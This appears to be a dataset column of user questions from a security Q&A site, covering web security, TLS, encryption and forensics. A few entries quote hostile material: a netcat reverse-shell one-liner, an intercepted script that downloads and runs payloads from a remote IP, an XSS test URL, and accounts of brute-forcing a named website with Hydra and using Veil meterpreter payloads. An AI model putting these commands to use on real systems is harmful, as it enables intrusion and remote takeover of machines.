instruction
stringlengths
24
29.9k
One of my colleagues has a web api call that is checking that the user is logged in and his token matches what is in session (thanks to all of you for your help). Let's say this is layer blue. After it's confirmed the user is who they say they are, it then makes a call to another API on another server (let's call it la...
I am wondering if there is a way to detect if a reverse shell is blocked by egress filtering or an obligatory proxy, or the exploit just failed. I am asking this question in the context of a SE media dropping senario.
I'm developing a webserver that performs digital signatures of (xml, pdf and office) documents and then validates those signatures. My idea is: an user puts its SmartCard and through a PIN, he gets his private key. Then, the private key must be sent to the server, so that the server may sign the document with that key....
I'm trying to develop a website that performs digital signatures on client-side and then sent the signed document to the server-side. I want to do the signatures on client, due to the fact of not sending away the user's private key. This key (in theory) must be always with the user and it must not be sent to the web (e...
My new router supports both the 2.4 and the 5 Ghz bands, and it obviously allows me to set a different password for each of them. Now, since cracking just one of the two means that the attacker would gain access to my network anyways without needing the other one, are there any reasons why I should set a different pass...
When trying to visit https://www.ebay.com, I noticed that I get redirected to HTTP immediately. Here's what cURL says about that: $ curl --max-redirs 0 -v -L https://www.ebay.com * Rebuilt URL to: https://www.ebay.com/ * Adding handle: conn: 0x6c8cc0 * Adding handle: send: 0 * Adding handle: recv: 0 * Curl_addHandleToP...
Is it possible to recover securely (or wiped out) deleted data from a hard drive using forensics? Imagine police have arrested a hacker, and that hacker, before getting caught, has removed all information that leads him/her to be found guilty on his/her PC using a secure deleting method. In this case, is it possible fo...
In TCG specification (for TPM devices) they specify how a static root of trust can be built up using secure boot and trusted boot. An alternative method appears to be Intel's Dynamic boot using their Intel TXT technology. I was just wondering from a security point of view which is preferable and what the major differen...
This paper appears to describe a solution in which XSS attacks stealing cookies are made pointless by having the server send clients a cookie with a hashed name. Whenever the user sends the cookie back to the server, the server will take the hash and regenerate the original name of the cookie. Thus, supposedly, even if...
I'm in the process of building a network of small devices (ARM microcontrollers with something like nRF24L01 connectivity). The controllers will be receiving commands from a central system over these wireless links, and I'm in the process of designing the protocol. Confidentiality is a non-goal, but integrity & authe...
I was wondering if I can put a download URL for my recipients to get my GPG public key easily in my email signature. Is this a good practice? If not, what's a good alternative?
I think the title question speaks for itself, but here are the details: You have 4 bits for the buttons, 16 bits for the counter, and a fix 16 bit ID. The transmitter would send out these bits plus an extra 32 bit word read from a ROM addressed by the counter. The reciever would look up the address in its own ROM and c...
The Triple Handshake Issue was disclosed lately. As far as I understand it, it highly depends on renegotiation and resumption. So the simple question is: Would disabling resumption and/or renegotiation mitigate this problem? In more details: Renegotiation seems to be quite secure, and there is only one problem about ne...
First of all i don't know if this question already mention here, believe me i search already. so i was trying to break string inside single and double quote of attr below; onclick="window.location='{$url4stat}en'" now lets say the webapps urls like http://example.com/index/ i was able to inject random param after the ...
When trying to encrypt files, I get the following error in KGpg editor window: The encryption failed with error code 2 On the command line I get: $ gpg --list-keys /home/user/.gnupg/pubring.gpg --------------------------------- pub 2048D/5E04B919 2012-02-02 [expires: 2016-02-01] uid Firstname Last...
How do you protect your server at the datacenter from physical access by unauthorized personal? Considering protection against malware (keylogger and trojans) and having data- and OS integrity? Is it even possible?
Linux, NetBSD, etc. can be installed with LUKS, so besides the /boot, all other FS will be encrypted. Probably the kernel needs to be booted before the password prompt gets to the user. The LUKS password My question: Does it makes sense to change the LUKS password at every 90 days? (I mean how can an attacker gain th...
This statement in the iOS 7 release notes implies that non-China devices do not need user consent: iOS now requests user consent for apps to use audio input on all iOS 7 devices. For devices sold in China, iOS will also request user consent for apps to use the camera hardware. iOS SDK Release Notes for iOS 7 GM ...
My web application is built with ASP.Net MVC5. One of the method accept query string params. Security testing has reported that it accepts malicious query string and displays in the body without any modification. the url including the Query parameters are added to the html output by the MVCContrib pager for paginatio...
Jsteg algorithm is vulnerable to statistical attacks because it influences the DCT histogram of an image perceptibly since it equalizes the number of paris of coefficients. F3 algorithm, instead of replacing LSB's, decrements the coefficient's absolute values. However, some shirngkage occure in this case. Beacuse 0 coe...
Should a user be allowed to request a password reset email and then log in (i.e. disregarding the reset email and using their existing password) or should the current account be locked until the password is reset? If you disabled the account I could see this being abused by an 3rd party (i.e. requesting a password rese...
I observed today that Thunderbird/Enigmail (24.2.0/1.6) does not allow me to select a key for encrypting mails to one of the addresses associated with the key, even though others work. Help sites claim that the reason must be a lack of user trust, but the key is trusted (fully). I think I tracked down the issue to some...
So, if I'm surfing the web (google etc..), can they see that I'm surfing from my laptop which is remotely connected to my desktop PC? Or will they only be able to see that my desktop PC is connected to their site? I'm currently using teamViewer for remote access to my desktop PC. Thanks, Jay.
I'm building an open source distributed (and partly offline replicated, as it's assumed that the network will be unstable) CMS and one of the core system 'job' will be to group all the files and generate a unique hash from them. This special hash will be checked against a genuine hash to see if they match, so to ensure...
I've been searching and searching for what seems days and have not come up with any definitive answer on a solution to my problem. To explain without going into terrible detail I am building a store, this store does NOT have a cart system, so the user will purchase one item at a time, possibly with a quantity system bu...
I have a CSV/Excel file which in which I want to test out the links which do not have SSL but ask for Username / Password. Is there a program which determines if each site on a list encrypts its login information as it is being sent?
Backstory: Stack Exchange's markdown parser allows a couple of HTML tags (a,b,i,img) through, with some restrictions on the attributes to prevent XSS. We're thinking of requesting the <cite> tag to be allowed so people can include citation metadata in the script. So, the question is, does allowing the <cite> tag to be ...
I've been using Diffie-Hellman (although, now looking into SRP) for sending data encrypted between two hosts. After the initial handshake, both the end hosts have generated the same shared secret. So, I immediately made the assumption that the shared secret can be used as a "password" in a cipher, since, I can safely a...
In one of the articles I have came across an exploit of Dell devices that said when you trigger the following line of code (executed somewhere in php) you will get a remote root shell : mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.100 4444 >/tmp/f I understand the part that by creating the fifo pipe and pipi...
I'm proposing the use of a login system that sends a one-time login token (with high entropy) via email to the user. After using the token, the user receives another token via email and the previous token is invalidated. The new token is sent with information about the use of the last token, so if someone does gain acc...
Why did firefox remove Javascript injection on address bar? Someone said it was a security issue. What security issues could there be?
I have never experimented much with online password crackers. I attempted to use Hydra today on this website www.athena2.harker.org and I keep getting false positives. This is what I have done so far: pinged the website and obtained the IP address of 209.23.201.55 identified the form type, its an https-form-post <form...
What packet parameters should be checked to detect layer-7 DDoS attack (http flood, slow http request etc.)? Do window size and packet timeline show enough information to detect attack traffic from legitimate traffic? What are the other parameters need to be verified?
Assuming the following: Operating arbitrary software in a completely read only environment is impractical. (While some software will operate RO without issue, it can be nigh impossible for other software, particularly if source code is not available as is sometimes the case) Rebuilding any machine in place is trivial ...
I have a two part question here. I have a javascript webapp accessing privileged REST endpoints. I would like to protect against CSRF. Currently, I have a login system built which returns a login cookie containing an encrypted payload (encrypt-then-MAC). I am reasonably sure the cookie contents cannot be tampered with...
I just got hired at this SW tech company with a few IT gurus in it. There is a clever genius that is suspect. He obtained my personal home email address I use. It was obtained from company communication during the hiring process. He some how set up a snooping system that is covertly social engineered in one of the yaho...
According to Wikipedia, the SD card reader recognizes if the little tab on the left of the SD card is in the "lock" position or not. Thus, a SD card reader can still write on the SD card even if the write protection is on by ignoring it. Is it true that the write protection is only a voluntary feature by the card reade...
Anyone know anything about OpenDNS? Is it safe to use, or should it be avoided? If it should be avoided, what are the alternatives? I am basically looking for a way to block certain sites from my home network, but at the same time, I don't want to use a service which isn't safe interms of privacy and freedom.
In order for our business to be PCI compliant, we need to prove that we are not vulnerable to CVE-2007-2243. This states that: OpenSSH 4.6 and earlier, when ChallengeResponseAuthentication is enabled, allows remote attackers to determine the existence of user accounts by attempting to authenticate via S/KEY, which dis...
Is it possible to DOS DNS by creating custom dns zones with lots of text records in them so that the size of the DNS zone is in the order for example 100 Gigabyes, and then query all the dns records from the zone from the internet and thus possibly filling up the disk of dns caching servers? Bind9 has a max-cache-size ...
https://en.wikipedia.org/wiki/DLL_injection My question: When someone is doing a DLL injection does anything gets written to disk? Or the whole attack is just in Memory?
I have inherited an ASP website where sensitive data was passed in the query string as part of the URL. Something like this: www.example.Com/Test?details=Username&moreDetails=blahblah If we change this to encrypt the query string, so Username and moreDetails are not visible, I assume I still have the issue that this e...
I want to find out if shodan uses my ip adresse to query the target after sending this HTTP request: https://api.shodan.io/shodan/host/{target_ip}?key={MY_API_KEY} so is shodan API a passive or active scanning tool ? the same for searching in shodan's home page ?
Can anyone tell me what this means? I'm on Bluehost with a shared server. [ip]71.63.199.72 [url]HNAP1 [size] 134 [status] 401 [method]GET [protocol] HTTP/1.1 [referring url] My server address [ip]71.63.199.72 [url]401 [size] 0 [status] 0 [method]\x80w\x01\x03\x01 [protocol] 162 [referring url] none [ip]141.212.121.10...
I am writing an iOS app which needs to be HIPAA compliant. The app should preferably function offline, so data needs to be stored on the phone. So here is what I was thinking of doing: On First Launch user enters username, password and a pass-phrase. The server authenticates the user using username, password and UDID(A...
I have received an image from a friend. This is the image. is there any way to detect any anomalies in this image. Thanks
One professor from my university proposed me and some colleagues to work on a paper about the digital declaration (which is supposed to be better than the digital signature) for passing the subject. Unfortunately, it doesn't seem to be a well known concept. One of the colleagues has done a search and she has only sent ...
If my PC has NO on-mainboard WLAN and there is NO WLAN-adapter card and NO USB WLAN-stick installed, how sure am I that there is really no WLAN connectivity possible ? I.e. can I really disconnect from the internet today ? Background: Say I wanna really disconnect (most of the time, yes I know I need to update virus s...
I know your time is valuable so I'm not waiting for specific answers to my situation. I don't mind reading documentation, so pointers to something that converges would be greatly appreciated. I don't plan to waste anyone's time.. This is not an urgent matter and I'm doing this to learn (the "site" doesn't serve anythin...
I am hot desking in the same office as a potential competitor & would be using the same wifi. The building owner runs the competitor company. My question is, can the wifi administrator see mail I have sent through outlook (via Google apps) when using my personal machine? Concerned about email content but also the actua...
I have a domain, where some other users have access to upload files, use email, use XMPP, etc. How can I prevent that these users go to a certificate authority and get a certificate for my domain? Unless the CA requires personal contact, how do they technically proof ownership of a domain? (Assuming a somewhat "truste...
Can anyone explain me these terms with respect to OAuth ? Consumer Key Consumer Secret Access Token Access Token Secret Also, when I registered my application with twitter I got the consumer key and consumer secret but how do I get the access token and access token secret ?
It must be possible to detect keylogging by close scrutiny of timing between physical keystroke execution and the character's eventual occurrence on the screen. I've had a friend show me this with his camera. The camera can record at 16,000 frames per second. He recorded himself typing the letter 'a' in program 1, the...
I am using veil framework to bypass av, when i want to choose a payload there are many choices, there is: rev_https_contained python/meterpreter/rev_https c/meterpreter/rev_tcp My question is what is the difference between first two shell codes, and is there any advantages to use https payloads?
I was cleaning my father’s laptop which was recently infected by a fairly tenacious piece of malware. It hasn't given any great clues as to what it is named or anything of that sort and thus far resisted me try most of the techniques. Some of the symptoms of the virus are: Popups while using some Adcash sites. Hijack...
I know, I know - "If P=NP" is a really large, high-impact assumption. But this is a hypothetical. I mean, clearly RSA (and similar methods of obfuscation) would likely become totally irrelevant - or would they? Being solvable in polynomic as opposed to exponential time would be a significant blow to their operation, b...
For the registration on my PHP powered website, I require email confirmation. After a user registers, a string is generated with the following code and sent to their email address. $key = md5(mt_rand(1000,999999).$_POST['email']); That string is also stored in the database, and if the user pastes the correct key in to...
I pay for a very basic web hosting plan, which includes a personal email address. Would the sysadmin of said host be able to read the content of my messages? How likely would my personal mail folder be encrypted and secure from prying eyes nowadays?
It seems that persistent logins are technically the same as storing a password on the client, and therefore should be avoided whenever possible. However, real life users would be unhappy with having to enter their password every time they wanted to access a site that they visit frequently. Given the following assumptio...
I'm looking over some JPEG files with an assumption that a steganography has been used for trial obfuscation due to the installation of JPHS. I've come across a file where the start of scan marker precedes the start of frame. Should this file be further inspected?
I see lots of people claim virus scanners are unnecessary on a linux server. But if this server accepts files uploaded from users (and lets others download them), does it become worth it to scan the files when they are uploaded on the server?
I spoke to a sysadmin in a business center today who intended to basically perform a MiTM (as he called it) on every connection in his network because people in his office building are using VPNs and https connections to stream video, download torrents etc.. These services use up all the bandwidth but because they are ...
I noticed a strangeness in the TLS 1.2 Handshake and I don't know if I'm missing something. As you can see in this screenshot, the browser (Chrome) puts the value 0x0301 as version in the Record Layer but it puts the 0x0303 value as version in the Handshake record. The used version is TLS 1.2 (SSL 3.3) actually. If I ...
I have intercepted an attack on my web server that I believe was unsuccessful. The attacker tried to execute this script: #!/bin/sh cd /tmp;cd /dev/shm wget -q http://221.132.37.26/xx -O ...x chmod +x ...x ./...x cd /dev/shm ; wget 221.132.37.26/ru ; bash ru ; rm -rf ru cd /dev/shm ; wget 221.132.37.26/rr; bash rr; r...
Is it safe to recycle unshredded paper credit card receipts? Can identity theft be helped by data disclosed on most vendor's receipts?
Recently, a large UK shopping chain had the staff payroll database leaked (including bank details, all unencrypted) We've been told that we cannot take legal action and have so far been denied compensation as although our data was stolen, it wasn't an external breach, it was someone internal leaking the data with privi...
I'm uploading files on S3, where the filename is a UUID. All files uploaded are publicly read/write, however these files are considered private to users. Is it possible for someone to guess a UUID, or randomly try a bunch of combinations to access some of these files? Is there a better way to secure S3 files?
X509 certificates used in PKI{X} have notBefore and notAfter dates. I'd like to stamp a certificate with a creation stamp, and the stamp is distinct from notBefore and notAfter. Is there an OID for a creation date/time? I looked through X.520 and did not see a similar OID. The description OID is already being used in t...
Suppose I received a call from internet with some virtual number, I called the same number back after few days but it didn't exist at the time or it was routed to some other user. Is there a way to reach the real person. Can I find out which service used to make these calls and then get that person info somehow?
I have read somewhere that the Data in Air Craft Black Boxes are encrypted using various algorithm and only the manufacturers could gain access to the actual data of the BlackBoxe, Why the data in Aircraft's Black Box is Encrypted anyway ? Here is the source where i read that: http://www.astm.org/SNEWS/OCTOBER_2001/bbo...
Just this week someone has been trying to attack the server of the company where I work. I have noticed that they have been trying to brute force root via ssh. fail2ban is handling that well and I never allowed password logins for root in the first place so that's not really a problem but they have been after our websi...
I have a osx 10.9 machine with a File Vault1 encrypted user partition. I would like to remove the encryption, but I don't remember the "master key" which is the only way to remove encryption on-the-fly without reinstalling everything. Moreover I have physical access user and root password which are same (but not maste...
The purpose of my question is get an better idea about reasonable amount of time the generation of the RSA public/private keypair should take? To be less vague let me specify the question and define I would use these commands to generate the keypair on an laptop running a recent 3.2.xx linux kernel. $ openssl genrsa -o...
There are questions about connecting to an untrusted host via SSH [1] [2], RDP, and with X11 forwarding enabled. What about when connecting via VNC? What risks are there to the client? To be clear: the assumption is that the remote host is under the control of a malicious party and they are actively trying to gain acc...
I notice that Chrome does not execute scrips that are part of the web request, http://vulnerable_site?pageTitle=<script>alert('xss')</script> With such links since the script is as part of the web request, Chrome does not execute the script. Does that prevent all kinds of Reflected XSS attacks with Chrome browser ? Edi...
I'm studying for an exam, that's why I don't need software for that purpose (which is what other questions I found on this topic provide) but an explanation. The concrete questions I'm trying to answer are: How can data securely be delete from a flash drive? What is the difference to deleting securely from a hard disk?...
I was about to reset my Facebook password and got this error: Your new password is too similar to your current password. Please try another password. I assumed that Facebook stores only password hashes, but if so, how can they measure passwords similarity? This should be impossible with good hashing function, right? ...
Does anyone know if there is a current overview (I only found ones from before 2006) which MUAs (mail clients) do support PGP/MIME? I wonder whether there still exist issues like "Outlook Express does not support PGP/MIME" or whether this issue can meanwhile be neglected? Thanks for any pointers... Regards. P.S.: This ...
I believe SSL is decrypted and encrypted from your computer to the receiver right? Well is it possible to use any type of encryption (Stanford crypto lib?) to get a password safely over the net these days? Well bulk password collection ISP side of course... And what if people started a movement thing to get an "Extensi...
First off I'd like to say this is my first post on StackExchange, so please let me know if there's anything wrong with it. Also, I don't know much about networking and I'm just making a simple java application (A packet listener with jnetpcap) to try to learn the basics. I'm using Low Orbit Ion Cannon to flood myself. ...
I have gain access to a server via ftp which is showing me the passwd file with 2 users via ftp://1.2.3.4/../etc/passwd output is: root:*:0:0:root:: ftp:*:109:117:Anonymous FTP:: As such the shadow file is not available and doesn't give the same response changing the url to X/../etc/shadow Is it possible to obtain th...
Is it possible to detect if a message has been tampered with, without using MAC (i.e. shared key) and without using a "trusted" third party (i.e. certificate authority)? I'm pretty sure it's not, but I would just like to be sure. Note: I don't care if the message is read by anyone else, I just don't want them to be abl...
I'm thinking of writing an application that communicates sensitive information (using Python, if that's relevant). Instead of using the standard GUI libraries (like GTK, Qt or wxWidgets), I was thinking of instead making a web interface using something like web.py to run a local server and take input this way. This wo...
Let's say I am following good security policy and picking passwords that are: Long Complex (passphrases where possible, otherwise random strings with special characters) Unique (completely independent for different sites/things) Changed regularly Let's also say that for this particular set of passwords, I do not feel...
I'm redesigning a login screen for a financial services application. Currently, this requests user ID and password, then (on the same screen) 2 digits from a 6-digit PIN are requested - these 2 digits are only revealed when the user ID and password have been entered. Looking around at other financial services provider...
I am pursuing a college project, in which I am running three fake services on three ports to protect the main service (say running at port 80). The concept is that if the user is malicious, he'll try to bring the services down and access the fake services. These ports adopt a blocking process of a connection request an...
Assume this scenario: Someone trying to hack a website. Simply put: www.site.com/example.php?=<script>alert(1)</script> A HIDS would see this attempt in Apache's access log, a NIDS would see this attempt in packet's HTTP section and the WAF in the URL. If all of them are detecting the attack, why are needed all of them...
You may know or probably are using TOR client which provides anonymity to the users but how can one be sure they are secure when browsing using this client and its network since its funded by feds? I have read this article by the Washington Post about TOR and it mentions that the Tor Executive Director Andrew Lewman's...
I'm implementing a Dropbox-like API, and one of my requirements is to have the files stored encrypted on the server. It is not required that the files are made unreadable by the server, only that they aren't stored clear on disk. I'm using Python with Flask for the API part and PyCrypto for the encryption. I know absol...
IP Addresses are pretty common around the internet so they're often easily found in plain text. However, let's say there's a number of IP addresses configured on a server to allow access through a firewall to specific locations. So, 1) these addresses are allowed access to a protected server and 2) someone else owns th...
I am running Kali Linux as a VM on my Windows machine which is NAT'd behind my company network, if I wish to pen test a website for a client and believe that a reverse shell is possible, what is a good way of achieving the connection? Note that I am not asking how to execute the exploit or inject the shellcode, but I a...
I'm planning a service that will require allowing users to run arbitrary JVM code on a server. I'm planning to sandbox the code, but I know that the JVM has traditionally had security holes, which is why I want to explore other avenues. There are already services such as Travis CI which allow anyone to run any code on ...
I've tried running Qualys' ssltest a few times and it keeps complaining that PFS isn't supported in some browsers. On their blog, they suggest a configuration for Apache 2.4 that should get an "A" grade in their ssltest, but the configuration [predictably] doesn't earn an "A" in Apache 2.2. Does anybody know if it's p...
Sorry if this is a very amateur question. I was checking out some article regarding CAPTCHA bypassing. And I though this article seemed interesting http://blog.opensecurityresearch.com/2012/08/bypassing-captchas-by-impersonating.html Now, this attack redirects the request from the Server(which is the client for the C...
Sometimes when I visit a website using HTTPS, I get a warning sign next to the URL in my browser (see screenshot; look for yellow/orange arrow) and I wonder if this marks a potential threat or an attack: The browser gives the reason "This website does not provide information about its owner" (I actually get this in Ge...
I'm working on an email client for Windows, and to send emails, my application needs to have the email address and the password of that email address. When the user gives his password, I store it encrypted. When sending an email, I pass the decrypted password. But there is one problem here: if I just encrypt a password...
Recently, We developed an application that we want it's users to pay for a monthly subscription in order to use it. So the first thing that came to our minds how to implement a secure way for our application to check for the User validity and those ideas came up Using WebClient to enter to our website and log in using...
I'm implementing a REST API and I've generated 128-bit random API keys which are used with HMAC-SHA1 for authorization. Should I hash the secret key on both the client and server before using it, maybe with SHA1 or bcrypt? This would avoid storing the secret key in plaintext. However I've been having trouble finding ot...
I see some strange (suspicious?) http requests in my webserver. Example: 192.161.x.x - - [14/Mar/2014:21:55:36 -0300] "GET /ce/c02i.html/RS=^ADAD3F3nOTvuESWLtAiP39aTQZiSRQ- HTTP/1.0" 404 881 "http://example.com/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.110 Safari/537...
I have to read http/https messages sent from a client system and see that the messages are not being modified within system by any malware and the server receives what exactly the user wants to send. For Example, a User in an online Banking Transaction wants to send Amount $100 to Account 'A' and lets say that the mes...